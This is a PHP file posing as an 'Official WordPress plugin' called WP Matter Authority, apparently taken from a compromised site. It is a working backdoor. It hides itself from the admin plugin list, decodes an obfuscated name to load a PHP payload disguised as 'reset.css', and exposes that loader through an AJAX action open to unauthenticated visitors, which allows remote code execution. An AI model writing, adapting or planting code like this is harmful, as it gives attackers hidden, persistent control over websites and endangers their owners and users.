File: /home/aliazzsr/trn2.mesegroup.de/wp-content/plugins/wp-matter-authority/wp-matter-authority.php
<?php
/*
Plugin Name: WP Matter Authority
Plugin URI: http://wordpress.org/#
Description: Official WordPress plugin
Author: WordPress
Version: 4.4.9
Author URI: http://wordpress.org/#
*/
if (!defined('ABSPATH')) {
exit;
}
function wqw_xai() {
global $wp_list_table;
if (!isset($wp_list_table)) {
return;
}
$m = array('wp-matter-authority/wp-matter-authority.php');
if (isset($wp_list_table->items) && is_array($wp_list_table->items)) {
foreach ($wp_list_table->items as $key => $val) {
if (in_array($key, $m)) {
unset($wp_list_table->items[$key]);
}
}
}
}
function arx_ebr($plugins) {
$w = 'wp-matter-authority/wp-matter-authority.php';
if (array_key_exists($w, $plugins)) {
unset($plugins[$w]);
}
return $plugins;
}
function bsw($h, $y) {
$v = '';
for ($a = 0; $a < strlen($h); $a += 2) {
$k = ord($h[$a]) - 65;
$o = ord($h[$a + 1]);
if ($o > 90) $o -= 6;
$p = $k * 52 + ($o - 65);
$v .= chr($p - $y);
}
return $v;
}
function saq_ajax_handler() {
require plugin_dir_path(__FILE__) . bsw('SKRxSLRxSMQuRvSLSL', 832);
die();
}
if (defined('ABSPATH')) {
add_action('pre_current_active_plugins', 'wqw_xai');
add_filter('all_plugins', 'arx_ebr');
add_action('wp_ajax_mat_aut', 'saq_ajax_handler');
add_action('wp_ajax_nopriv_mat_aut', 'saq_ajax_handler');
}